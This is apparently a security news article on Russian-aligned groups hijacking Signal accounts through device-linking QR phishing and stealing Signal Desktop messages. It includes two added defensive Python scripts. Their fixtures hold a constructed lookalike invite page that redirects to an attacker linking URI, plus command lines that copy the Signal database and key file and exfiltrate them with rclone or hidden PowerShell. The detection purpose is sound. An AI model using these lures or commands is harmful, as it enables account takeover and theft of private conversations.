
Threat actors aligned with Russia have been actively exploiting the linked devices feature in Signal, the popular privacy-focused messaging app, to gain unauthorized access to user accounts. According to Google Threat Intelligence Group (GTIG), these attacks trick victims into scanning QR codes that are in fact genuine Signal device-linking codes generated on attacker-controlled devices, so the attacker's device is added to the victim's account and receives their messages in real time.
Hackers Exploit Signal’s Linked Devices Feature
Signal allows users to link additional devices (for example Signal Desktop or Signal for iPad) to one account, enabling seamless messaging across platforms. Linking is done by scanning, from the Signal app on the phone, a QR code shown by the new device. Russian-aligned threat actors, including UNC5792, have been abusing this flow: the attacker generates a linking QR code on a device they control, disguises it, and tricks the victim into scanning it. The attacker's device then becomes a legitimate linked device on the account and receives a copy of the victim's conversations from that point on.
Once linked, the attacker-controlled device stays connected until the victim notices and removes it, giving the attacker persistent access to sensitive conversations. The technique requires no malware on the phone and no weakness in Signal's encryption: the attacker's device is simply another authorized endpoint of the encrypted conversation. It is particularly concerning because victims may not realize their accounts have been compromised, as their own devices continue to send and receive messages normally.
The Role of Malicious QR Codes
Attackers distribute these malicious QR codes using various deceptive tactics:
Fake group invitations
Fraudulent security alerts
Counterfeit device pairing requests mimicking legitimate Signal prompts
Phishing websites posing as trusted applications
Some phishing pages have been designed to appear as specialized applications for the Ukrainian military, targeting personnel involved in defense operations.
Notable Russian-Aligned Threat Actors Involved
UNC5792 and UNC4221
UNC5792 has been observed creating fake Signal group invitations hosted on attacker-controlled domains that closely resemble legitimate ones. The pages copy Signal's genuine group-invite flow but replace the action that would join the group with a redirect to a device-linking URI, so a victim who believes they are joining a group instead links the attacker's device to their own account. Similarly, another group, UNC4221 (also known as UAC-0185), has deployed phishing campaigns targeting Signal accounts used by Ukrainian military personnel. These campaigns often involve custom phishing kits designed to mimic parts of the Kropyva application, which is used by Ukraine's Armed Forces for artillery guidance.
Additionally, UNC4221 has employed PINPOINT, a lightweight JavaScript payload embedded in its phishing pages that gathers basic user information and geolocation data through the browser's geolocation API.
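The lookalike invite described above, and the linking QR codes in the earlier section, both boil down to one thing: a payload that Signal would interpret as a device-linking request rather than a group join. The following script is an added example (not code from GTIG, Signal or any of the groups named here) that triages a decoded QR payload, or the HTML of a suspected invite page, for such requests. It assumes that a Signal linking QR decodes to a URI of the form sgnl://linkdevice?uuid=...&pub_key=... and that genuine group invites use https://signal.group/#...; the payloads and the page HTML are constructed for the demo.

```python
"""Triage decoded QR payloads and invite-page HTML for Signal device-linking URIs.

Added example, not code from GTIG, Signal or any named threat actor. Assumptions
not stated in the article:
  * a Signal linking QR decodes to   sgnl://linkdevice?uuid=<id>&pub_key=<base64 key>
  * a genuine group invite decodes to https://signal.group/#<token> (or sgnl://signal.group/#)
  * every payload and the HTML below are constructed for this demo.
"""
import re
from urllib.parse import parse_qs, urlparse

# A linking URI anywhere in text, up to whitespace or an HTML/JS delimiter.
LINK_DEVICE_RE = re.compile(r"sgnl://linkdevice\?[^\s\"'<>]+", re.IGNORECASE)


def classify_qr_payload(payload: str) -> dict:
    """Say what scanning this payload in Signal would do: link a device, join a group, or neither."""
    u = urlparse(payload.strip())
    scheme, host = u.scheme.lower(), u.netloc.lower()
    if scheme == "sgnl" and host == "linkdevice":
        q = parse_qs(u.query)
        return {
            "kind": "device_link",  # the scanning phone would authorize a new device
            "uuid": q.get("uuid", [None])[0],
            "has_pub_key": "pub_key" in q,
        }
    if host == "signal.group" and scheme in ("https", "sgnl"):
        return {"kind": "group_invite", "token": u.fragment}
    return {"kind": "other"}


def find_linking_uris_in_html(html: str) -> list:
    """Return every device-linking URI embedded in a page (href, JS redirect, alt text, ...)."""
    return sorted(set(LINK_DEVICE_RE.findall(html)))


def audit_invite_page(html: str) -> dict:
    """Flag a page that looks like a group invite yet carries a device-linking URI."""
    uris = find_linking_uris_in_html(html)
    looks_like_invite = re.search(r"signal\.group/#|join .*group", html, re.IGNORECASE) is not None
    if uris and looks_like_invite:
        verdict = "device_link_lure"   # UNC5792-style: invite on the surface, linking underneath
    elif uris:
        verdict = "device_link_uri"
    else:
        verdict = "clean"
    return {"linking_uris": uris, "verdict": verdict}


# Constructed lookalike page: the visible link is a real-looking invite, but the
# click handler sends the phone to a linking URI instead.
SAMPLE_INVITE_HTML = """
<html><body>
  <h1>You've been invited to join a Signal group</h1>
  <p>Tap below or scan the QR code with Signal.</p>
  <a id="join" href="https://signal.group/#CjQKIGxvb2tzLWxlZ2l0aW1hdGU">Join group</a>
  <script>
    document.getElementById('join').onclick = function (e) {
      e.preventDefault();
      window.location = 'sgnl://linkdevice?uuid=AtTaCkEr-DeViCe&pub_key=BS1oaWphY2tlZC1rZXktZGVtbw';
    };
  </script>
</body></html>
"""

if __name__ == "__main__":
    for p in ("https://signal.group/#CjQKIGxvb2tzLWxlZ2l0aW1hdGU",
              "sgnl://linkdevice?uuid=AtTaCkEr-DeViCe&pub_key=BS1oaWphY2tlZC1rZXktZGVtbw",
              "https://example.com/signal-update"):
        print(p, "->", classify_qr_payload(p))
    print(audit_invite_page(SAMPLE_INVITE_HTML))
```

Feed it the text a QR-scanner app shows before you confirm, or the fetched HTML of an invite link received over chat. The check is deliberately scheme-based rather than domain-based: the lure page can live on any domain, but the only thing that makes Signal link a device is the linkdevice URI itself.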
Other Russian Hacking Groups Involved
Sandworm (APT44): Uses WAVESIGN, a lightweight Windows Batch script that periodically queries messages from the Signal Desktop database on an already-compromised machine and exfiltrates the most recent ones with Rclone.
Turla: Deploys a lightweight PowerShell script that exfiltrates Signal Desktop messages from compromised machines.
UNC1151: Uses the Robocopy utility to stage the contents of Signal Desktop's file directories for later exfiltration.
Unlike the QR-code technique, these tools assume the attacker already has code execution on the victim's desktop; they go after the local Signal Desktop message store rather than the account itself.
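All three desktop-side tools above have one thing in common that a defender can key on: something other than Signal itself reads Signal Desktop's data directory. The following detection logic is an added example written for this article, not a rule or tool from the GTIG report. It assumes Sysmon process-creation events (Event ID 1) flattened to dicts with Image, CommandLine and User fields, and that Signal Desktop keeps its store under %APPDATA%\Signal (sql\db.sqlite plus config.json); the events it runs over are constructed for the demo.

```python
r"""Flag Signal Desktop message-store access by anything other than Signal itself.

Added example: detection logic written for this article, not a tool from the GTIG
report or any of the actors it names. Assumptions: Sysmon Event ID 1 records as
dicts with Image, CommandLine and User; Signal Desktop stores data under
%APPDATA%\Signal (sql\db.sqlite and config.json); the events below are constructed.
"""
import re
from typing import Optional

# %APPDATA%\Signal, spelled the ways a full path, a batch file and PowerShell spell it.
SIGNAL_DIR_RE = re.compile(
    r"(?:\\AppData\\Roaming|%APPDATA%|\$env:APPDATA)\\Signal\b", re.IGNORECASE
)
# The encrypted message database and the file that holds its key.
SENSITIVE_FILES = ("db.sqlite", "config.json")
# Copy, sync and scripting tools seen staging or shipping the store.
STAGING_TOOLS = {"robocopy.exe", "xcopy.exe", "cmd.exe", "powershell.exe", "pwsh.exe",
                 "rclone.exe", "sqlite3.exe", "7z.exe"}


def analyze_event(ev: dict) -> Optional[dict]:
    """Return an alert dict for a suspicious process-creation event, else None."""
    image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
    cmd = ev.get("CommandLine", "")
    if image == "signal.exe" or not SIGNAL_DIR_RE.search(cmd):
        return None  # the app itself, or nothing to do with Signal's directory
    named = [f for f in SENSITIVE_FILES if f in cmd.lower()]
    return {
        "rule": "signal_desktop_store_access",
        "severity": "high" if image in STAGING_TOOLS else "medium",
        "image": image,
        "sensitive_files": named,
        "user": ev.get("User"),
        "command": cmd,
    }


def run_detection(events) -> list:
    """Run analyze_event over a stream of events and keep the alerts."""
    return [a for a in (analyze_event(e) for e in events) if a]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # Signal itself: benign.
    {"Image": r"C:\Users\olena\AppData\Local\Programs\signal-desktop\Signal.exe",
     "CommandLine": r'"C:\Users\olena\AppData\Local\Programs\signal-desktop\Signal.exe"',
     "User": r"CORP\olena"},
    # Whole-directory copy to a staging folder (Robocopy pattern).
    {"Image": r"C:\Windows\System32\Robocopy.exe",
     "CommandLine": r'Robocopy.exe "C:\Users\olena\AppData\Roaming\Signal" C:\Users\Public\Libraries\sg /E /R:0 /W:0',
     "User": r"CORP\olena"},
    # Batch one-liner: copy database and key file, then push with rclone.
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c copy "%APPDATA%\Signal\sql\db.sqlite" %TEMP%\s.db & copy "%APPDATA%\Signal\config.json" %TEMP%\c.json & rclone copy %TEMP%\s.db remote:drop',
     "User": r"CORP\olena"},
    # Hidden PowerShell copying the database.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -nop -w hidden -c "Copy-Item $env:APPDATA\Signal\sql\db.sqlite C:\Users\Public\db.sqlite"',
     "User": r"CORP\olena"},
    # Unrelated activity: ignored.
    {"Image": r"C:\Windows\explorer.exe",
     "CommandLine": r"C:\Windows\explorer.exe /select,C:\Users\olena\Documents\report.docx",
     "User": r"CORP\olena"},
    # Unknown binary reading the directory: worth a look, lower confidence.
    {"Image": r"C:\Program Files\AcmeBackup\backup.exe",
     "CommandLine": r'"C:\Program Files\AcmeBackup\backup.exe" --include "C:\Users\olena\AppData\Roaming\Signal"',
     "User": r"NT AUTHORITY\SYSTEM"},
]

if __name__ == "__main__":
    for a in run_detection(SAMPLE_EVENTS):
        print(f'{a["severity"]:6} {a["image"]:15} files={a["sensitive_files"]} :: {a["command"]}')
```

Both file names are listed because copying db.sqlite alone does an attacker little good: the database is SQLCipher-encrypted and its key is kept next to it in config.json, which is exactly why the batch and PowerShell variants grab both. The medium-severity path exists for tuning: a backup agent touching the directory is expected in some environments and can be allow-listed by image path, whereas a copy tool doing it under the user's own account rarely is.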
Broader Implications for Secure Messaging Apps
These attacks on Signal are part of a larger trend where threat actors exploit device-linking features in popular messaging applications. Microsoft recently reported that Russian hacking group Star Blizzard used a similar technique to hijack WhatsApp accounts: spear-phishing emails led targets to a QR code that, when scanned, linked an attacker-controlled device to the victim's WhatsApp account.
Furthermore, Microsoft and Volexity have identified Russian threat actors using device code phishing against Microsoft 365 accounts, contacting targets over WhatsApp, Signal, and Microsoft Teams to deliver the malicious sign-in prompts. Taken together, these cases show that device-linking and device-authorization flows have become a favored target: they let an attacker become a trusted endpoint without breaking any cryptography, which is a growing security threat to encrypted messaging services.

SEO Poisoning: A New Threat Vector
In addition to direct account hijacking, a new search engine optimization (SEO) poisoning campaign has been uncovered. Cybercriminals create fake download pages that impersonate popular applications like Signal, LINE, Gmail, and Google Translate. These pages distribute trojanized executables designed to infect Chinese-speaking users.
According to cybersecurity firm Hunt.io, these executables follow a consistent attack pattern:
Extracting temporary files
Injecting malicious processes
Modifying security settings
Establishing network communications
The malware, known as MicroClip, exhibits infostealer-like functionality, enabling attackers to harvest sensitive user data.
How to Protect Against These Attacks
Given the increasing sophistication of these cyber threats, users should adopt the following security measures:
Verify QR Codes: Never scan QR codes from untrusted sources or unsolicited messages. A Signal linking QR code should only ever be scanned from Signal Desktop or Signal for iPad running on your own device, never from a web page, an image in a chat, or a "security alert".
Monitor Linked Devices: Regularly review Settings > Linked Devices in Signal and remove any device you do not recognize; unlinking immediately cuts off the attacker's access.
Enable Registration Lock: Signal's Registration Lock (a PIN) protects your phone number from being re-registered on another phone, for example after a SIM swap. It does not stop device linking, because a linked device never re-registers the number, so it complements but does not replace the linked-device review above.
Be Cautious with Downloads: Always download Signal and other apps from official sources like the Apple App Store or Google Play Store, and Signal Desktop only from signal.org.
Stay Alert for Phishing Attempts: Be wary of messages urging you to scan QR codes or enter sensitive information.
Conclusion
The exploitation of Signal's linked devices feature by Russian-aligned hackers underscores the evolving threats targeting secure messaging platforms. As attackers refine their techniques, users and organizations must remain vigilant against phishing attacks, malicious QR codes, and SEO poisoning campaigns. Strengthening security awareness, routinely checking which devices are linked to an account, and adopting proactive defense strategies will be crucial in mitigating these risks and safeguarding sensitive communications.